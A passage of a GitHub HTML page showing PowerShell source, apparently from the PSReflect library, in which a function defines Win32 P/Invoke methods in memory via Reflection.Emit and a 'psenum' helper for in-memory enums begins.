class=\"pl-smi\">Namespace</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L277\" class=\"blob-num js-line-number\" data-line-number=\"277\"></td>\n        <td id=\"LC277\" class=\"blob-code blob-code-inner js-file-line\">                {</td>\n      </tr>\n      <tr>\n        <td id=\"L278\" class=\"blob-num js-line-number\" data-line-number=\"278\"></td>\n        <td id=\"LC278\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.GetType</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">Namespace</span>.<span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span>&quot;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L279\" class=\"blob-num js-line-number\" data-line-number=\"279\"></td>\n        <td id=\"LC279\" class=\"blob-code blob-code-inner js-file-line\">                }</td>\n      </tr>\n      <tr>\n        <td id=\"L280\" class=\"blob-num js-line-number\" data-line-number=\"280\"></td>\n        <td id=\"LC280\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L281\" class=\"blob-num js-line-number\" data-line-number=\"281\"></td>\n        <td id=\"LC281\" class=\"blob-code blob-code-inner js-file-line\">                {</td>\n      </tr>\n      <tr>\n        <td id=\"L282\" class=\"blob-num js-line-number\" data-line-number=\"282\"></td>\n        <td id=\"LC282\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.GetType</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L283\" class=\"blob-num js-line-number\" data-line-number=\"283\"></td>\n        <td id=\"LC283\" class=\"blob-code blob-code-inner js-file-line\">                }</td>\n      </tr>\n      <tr>\n        <td id=\"L284\" class=\"blob-num js-line-number\" data-line-number=\"284\"></td>\n        <td id=\"LC284\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L285\" class=\"blob-num js-line-number\" data-line-number=\"285\"></td>\n        <td id=\"LC285\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L286\" class=\"blob-num js-line-number\" data-line-number=\"286\"></td>\n        <td id=\"LC286\" class=\"blob-code blob-code-inner js-file-line\">            {</td>\n      </tr>\n      <tr>\n        <td id=\"L287\" class=\"blob-num js-line-number\" data-line-number=\"287\"></td>\n        <td id=\"LC287\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-c\"># Define one type for each DLL</span></td>\n      </tr>\n      <tr>\n        <td id=\"L288\" class=\"blob-num js-line-number\" data-line-number=\"288\"></td>\n        <td id=\"LC288\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">!</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-en\">.ContainsKey</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L289\" class=\"blob-num js-line-number\" data-line-number=\"289\"></td>\n        <td id=\"LC289\" class=\"blob-code blob-code-inner js-file-line\">                {</td>\n      </tr>\n      <tr>\n        <td id=\"L290\" class=\"blob-num js-line-number\" data-line-number=\"290\"></td>\n        <td id=\"LC290\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Namespace</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L291\" class=\"blob-num js-line-number\" data-line-number=\"291\"></td>\n        <td id=\"LC291\" class=\"blob-code blob-code-inner js-file-line\">                    {</td>\n      </tr>\n      <tr>\n        <td id=\"L292\" class=\"blob-num js-line-number\" data-line-number=\"292\"></td>\n        <td id=\"LC292\" class=\"blob-code blob-code-inner js-file-line\">                        <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.DefineType</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">Namespace</span>.<span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span>&quot;</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Public,BeforeFieldInit&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L293\" class=\"blob-num js-line-number\" data-line-number=\"293\"></td>\n        <td id=\"LC293\" class=\"blob-code blob-code-inner js-file-line\">                    }</td>\n      </tr>\n      <tr>\n        <td id=\"L294\" class=\"blob-num js-line-number\" data-line-number=\"294\"></td>\n        <td id=\"LC294\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L295\" class=\"blob-num js-line-number\" data-line-number=\"295\"></td>\n        <td id=\"LC295\" class=\"blob-code blob-code-inner js-file-line\">                    {</td>\n      </tr>\n      <tr>\n        <td id=\"L296\" class=\"blob-num js-line-number\" data-line-number=\"296\"></td>\n        <td id=\"LC296\" class=\"blob-code blob-code-inner js-file-line\">                        <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.DefineType</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Public,BeforeFieldInit&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L297\" class=\"blob-num js-line-number\" data-line-number=\"297\"></td>\n        <td id=\"LC297\" class=\"blob-code blob-code-inner js-file-line\">                    }</td>\n      </tr>\n      <tr>\n        <td id=\"L298\" class=\"blob-num js-line-number\" data-line-number=\"298\"></td>\n        <td id=\"LC298\" class=\"blob-code blob-code-inner js-file-line\">                }</td>\n      </tr>\n      <tr>\n        <td id=\"L299\" class=\"blob-num js-line-number\" data-line-number=\"299\"></td>\n        <td id=\"LC299\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L300\" class=\"blob-num js-line-number\" data-line-number=\"300\"></td>\n        <td id=\"LC300\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">Method</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-e\">]</span>.DefineMethod<span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L301\" class=\"blob-num js-line-number\" data-line-number=\"301\"></td>\n        <td id=\"LC301\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">FunctionName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L302\" class=\"blob-num js-line-number\" data-line-number=\"302\"></td>\n        <td id=\"LC302\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-s\">&#39;Public,Static,PinvokeImpl&#39;</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L303\" class=\"blob-num js-line-number\" data-line-number=\"303\"></td>\n        <td id=\"LC303\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnType</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L304\" class=\"blob-num js-line-number\" data-line-number=\"304\"></td>\n        <td id=\"LC304\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">ParameterTypes</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L305\" class=\"blob-num js-line-number\" data-line-number=\"305\"></td>\n        <td id=\"LC305\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L306\" class=\"blob-num js-line-number\" data-line-number=\"306\"></td>\n        <td id=\"LC306\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-c\"># Make each ByRef parameter an Out parameter</span></td>\n      </tr>\n      <tr>\n        <td id=\"L307\" class=\"blob-num js-line-number\" data-line-number=\"307\"></td>\n        <td id=\"LC307\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\"><span class=\"pl-c1\">1</span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L308\" class=\"blob-num js-line-number\" data-line-number=\"308\"></td>\n        <td id=\"LC308\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">foreach</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Parameter</span> <span class=\"pl-k\">in</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ParameterTypes</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L309\" class=\"blob-num js-line-number\" data-line-number=\"309\"></td>\n        <td id=\"LC309\" class=\"blob-code blob-code-inner js-file-line\">                {</td>\n      </tr>\n      <tr>\n        <td id=\"L310\" class=\"blob-num js-line-number\" data-line-number=\"310\"></td>\n        <td id=\"LC310\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Parameter</span><span class=\"pl-en\">.IsByRef</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L311\" class=\"blob-num js-line-number\" data-line-number=\"311\"></td>\n        <td id=\"LC311\" class=\"blob-code blob-code-inner js-file-line\">                    {</td>\n      </tr>\n      <tr>\n        <td id=\"L312\" class=\"blob-num js-line-number\" data-line-number=\"312\"></td>\n        <td id=\"LC312\" class=\"blob-code blob-code-inner js-file-line\">                        <span class=\"pl-e\">[void]</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Method</span><span class=\"pl-en\">.DefineParameter</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Out&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-c1\">null</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L313\" class=\"blob-num js-line-number\" data-line-number=\"313\"></td>\n        <td id=\"LC313\" class=\"blob-code blob-code-inner js-file-line\">                    }</td>\n      </tr>\n      <tr>\n        <td id=\"L314\" class=\"blob-num js-line-number\" data-line-number=\"314\"></td>\n        <td id=\"LC314\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L315\" class=\"blob-num js-line-number\" data-line-number=\"315\"></td>\n        <td id=\"LC315\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span><span class=\"pl-k\">++</span></td>\n      </tr>\n      <tr>\n        <td id=\"L316\" class=\"blob-num js-line-number\" data-line-number=\"316\"></td>\n        <td id=\"LC316\" class=\"blob-code blob-code-inner js-file-line\">                }</td>\n      </tr>\n      <tr>\n        <td id=\"L317\" class=\"blob-num js-line-number\" data-line-number=\"317\"></td>\n        <td id=\"LC317\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L318\" class=\"blob-num js-line-number\" data-line-number=\"318\"></td>\n        <td id=\"LC318\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllImport</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Runtime.InteropServices.DllImportAttribute]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L319\" class=\"blob-num js-line-number\" data-line-number=\"319\"></td>\n        <td id=\"LC319\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">SetLastErrorField</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllImport</span><span class=\"pl-en\">.GetField</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;SetLastError&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L320\" class=\"blob-num js-line-number\" data-line-number=\"320\"></td>\n        <td id=\"LC320\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">CallingConventionField</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllImport</span><span class=\"pl-en\">.GetField</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;CallingConvention&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L321\" class=\"blob-num js-line-number\" data-line-number=\"321\"></td>\n        <td id=\"LC321\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">CharsetField</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllImport</span><span class=\"pl-en\">.GetField</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;CharSet&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L322\" class=\"blob-num js-line-number\" data-line-number=\"322\"></td>\n        <td id=\"LC322\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">SetLastError</span><span class=\"pl-k\">)</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">SLEValue</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-c1\">True</span> } <span class=\"pl-k\">else</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">SLEValue</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-c1\">False</span> }</td>\n      </tr>\n      <tr>\n        <td id=\"L323\" class=\"blob-num js-line-number\" data-line-number=\"323\"></td>\n        <td id=\"LC323\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L324\" class=\"blob-num js-line-number\" data-line-number=\"324\"></td>\n        <td id=\"LC324\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-c\"># Equivalent to C# version of [DllImport(DllName)]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L325\" class=\"blob-num js-line-number\" data-line-number=\"325\"></td>\n        <td id=\"LC325\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">Constructor</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Runtime.InteropServices.DllImportAttribute]</span>.GetConstructor<span class=\"pl-k\">(</span><span class=\"pl-e\">[String]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L326\" class=\"blob-num js-line-number\" data-line-number=\"326\"></td>\n        <td id=\"LC326\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllImportAttribute</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> Reflection.Emit.CustomAttributeBuilder<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Constructor</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L327\" class=\"blob-num js-line-number\" data-line-number=\"327\"></td>\n        <td id=\"LC327\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[Reflection.PropertyInfo[]]</span> <span class=\"pl-k\">@()</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[Object[]]</span> <span class=\"pl-k\">@()</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L328\" class=\"blob-num js-line-number\" data-line-number=\"328\"></td>\n        <td id=\"LC328\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-e\">[Reflection.FieldInfo[]]</span> <span class=\"pl-k\">@($</span><span class=\"pl-smi\">SetLastErrorField</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">CallingConventionField</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">CharsetField</span><span class=\"pl-k\">)</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L329\" class=\"blob-num js-line-number\" data-line-number=\"329\"></td>\n        <td id=\"LC329\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-e\">[Object[]]</span> <span class=\"pl-k\">@($</span><span class=\"pl-smi\">SLEValue</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">(</span><span class=\"pl-e\">[Runtime.InteropServices.CallingConvention]</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">NativeCallingConvention</span><span class=\"pl-k\">)</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">(</span><span class=\"pl-e\">[Runtime.InteropServices.CharSet]</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Charset</span><span class=\"pl-k\">))</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L330\" class=\"blob-num js-line-number\" data-line-number=\"330\"></td>\n        <td id=\"LC330\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L331\" class=\"blob-num js-line-number\" data-line-number=\"331\"></td>\n        <td id=\"LC331\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">Method</span><span class=\"pl-en\">.SetCustomAttribute</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DllImportAttribute</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L332\" class=\"blob-num js-line-number\" data-line-number=\"332\"></td>\n        <td id=\"LC332\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L333\" class=\"blob-num js-line-number\" data-line-number=\"333\"></td>\n        <td id=\"LC333\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L334\" class=\"blob-num js-line-number\" data-line-number=\"334\"></td>\n        <td id=\"LC334\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L335\" class=\"blob-num js-line-number\" data-line-number=\"335\"></td>\n        <td id=\"LC335\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">END</span></td>\n      </tr>\n      <tr>\n        <td id=\"L336\" class=\"blob-num js-line-number\" data-line-number=\"336\"></td>\n        <td id=\"LC336\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L337\" class=\"blob-num js-line-number\" data-line-number=\"337\"></td>\n        <td id=\"LC337\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span> <span class=\"pl-k\">-is</span> <span class=\"pl-e\">[Reflection.Assembly]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L338\" class=\"blob-num js-line-number\" data-line-number=\"338\"></td>\n        <td id=\"LC338\" class=\"blob-code blob-code-inner js-file-line\">            {</td>\n      </tr>\n      <tr>\n        <td id=\"L339\" class=\"blob-num js-line-number\" data-line-number=\"339\"></td>\n        <td id=\"LC339\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">return</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span></td>\n      </tr>\n      <tr>\n        <td id=\"L340\" class=\"blob-num js-line-number\" data-line-number=\"340\"></td>\n        <td id=\"LC340\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L341\" class=\"blob-num js-line-number\" data-line-number=\"341\"></td>\n        <td id=\"LC341\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L342\" class=\"blob-num js-line-number\" data-line-number=\"342\"></td>\n        <td id=\"LC342\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnTypes</span> <span class=\"pl-k\">=</span> @{}</td>\n      </tr>\n      <tr>\n        <td id=\"L343\" class=\"blob-num js-line-number\" data-line-number=\"343\"></td>\n        <td id=\"LC343\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L344\" class=\"blob-num js-line-number\" data-line-number=\"344\"></td>\n        <td id=\"LC344\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">foreach</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Key</span> <span class=\"pl-k\">in</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-en\">.Keys</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L345\" class=\"blob-num js-line-number\" data-line-number=\"345\"></td>\n        <td id=\"LC345\" class=\"blob-code blob-code-inner js-file-line\">            {</td>\n      </tr>\n      <tr>\n        <td id=\"L346\" class=\"blob-num js-line-number\" data-line-number=\"346\"></td>\n        <td id=\"LC346\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TypeHash</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Key</span><span class=\"pl-e\">]</span>.CreateType<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L347\" class=\"blob-num js-line-number\" data-line-number=\"347\"></td>\n        <td id=\"LC347\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L348\" class=\"blob-num js-line-number\" data-line-number=\"348\"></td>\n        <td id=\"LC348\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnTypes</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Key</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span></td>\n      </tr>\n      <tr>\n        <td id=\"L349\" class=\"blob-num js-line-number\" data-line-number=\"349\"></td>\n        <td id=\"LC349\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L350\" class=\"blob-num js-line-number\" data-line-number=\"350\"></td>\n        <td id=\"LC350\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L351\" class=\"blob-num js-line-number\" data-line-number=\"351\"></td>\n        <td id=\"LC351\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">return</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnTypes</span></td>\n      </tr>\n      <tr>\n        <td id=\"L352\" class=\"blob-num js-line-number\" data-line-number=\"352\"></td>\n        <td id=\"LC352\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L353\" class=\"blob-num js-line-number\" data-line-number=\"353\"></td>\n        <td id=\"LC353\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L354\" class=\"blob-num js-line-number\" data-line-number=\"354\"></td>\n        <td id=\"LC354\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L355\" class=\"blob-num js-line-number\" data-line-number=\"355\"></td>\n        <td id=\"LC355\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L356\" class=\"blob-num js-line-number\" data-line-number=\"356\"></td>\n        <td id=\"LC356\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-k\">function</span> <span class=\"pl-en\">psenum</span></td>\n      </tr>\n      <tr>\n        <td id=\"L357\" class=\"blob-num js-line-number\" data-line-number=\"357\"></td>\n        <td id=\"LC357\" class=\"blob-code blob-code-inner js-file-line\">  {</td>\n      </tr>\n      <tr>\n        <td id=\"L358\" class=\"blob-num js-line-number\" data-line-number=\"358\"></td>\n        <td id=\"LC358\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">&lt;#</span></td>\n      </tr>\n      <tr>\n        <td id=\"L359\" class=\"blob-num js-line-number\" data-line-number=\"359\"></td>\n        <td id=\"LC359\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">SYNOPSIS</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L360\" class=\"blob-num js-line-number\" data-line-number=\"360\"></td>\n        <td id=\"LC360\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L361\" class=\"blob-num js-line-number\" data-line-number=\"361\"></td>\n        <td id=\"LC361\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Creates an in-memory enumeration for use in your PowerShell session.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L362\" class=\"blob-num js-line-number\" data-line-number=\"362\"></td>\n        <td id=\"LC362\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L363\" class=\"blob-num js-line-number\" data-line-number=\"363\"></td>\n        <td id=\"LC363\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Author: Matthew Graeber (@mattifestation)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L364\" class=\"blob-num js-line-number\" data-line-number=\"364\"></td>\n        <td id=\"LC364\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    License: BSD 3-Clause</span></td>\n      </tr>\n      <tr>\n        <td id=\"L365\" class=\"blob-num js-line-number\" data-line-number=\"365\"></td>\n        <td id=\"LC365\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Required Dependencies: None</span></td>\n      </tr>\n      <tr>\n        <td id=\"L366\" class=\"blob-num js-line-number\" data-line-number=\"366\"></td>\n        <td id=\"LC366\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Optional Dependencies: None</span></td>\n      </tr>\n      <tr>\n        <td id=\"L367\" class=\"blob-num js-line-number\" data-line-number=\"367\"></td>\n        <td id=\"LC367\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"> </span></td>\n      </tr>\n      <tr>\n        <td id=\"L368\" class=\"blob-num js-line-number\" data-line-number=\"368\"></td>\n        <td id=\"LC368\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">DESCRIPTION</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L369\" class=\"blob-num js-line-number\" data-line-number=\"369\"></td>\n        <td id=\"LC369\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L370\" class=\"blob-num js-line-number\" data-line-number=\"370\"></td>\n        <td id=\"LC370\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The &#39;psenum&#39; function facilitates the creation of enums entirely in</span></td>\n      </tr>\n      <tr>\n        <td id=\"L371\" class=\"blob-num js-line-number\" data-line-number=\"371\"></td>\n        <td id=\"LC371\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    memory using as close to a &quot;C style&quot; as PowerShell will allow.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L372\" class=\"blob-num js-line-number\" data-line-number=\"372\"></td>\n        <td id=\"LC372\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L373\" 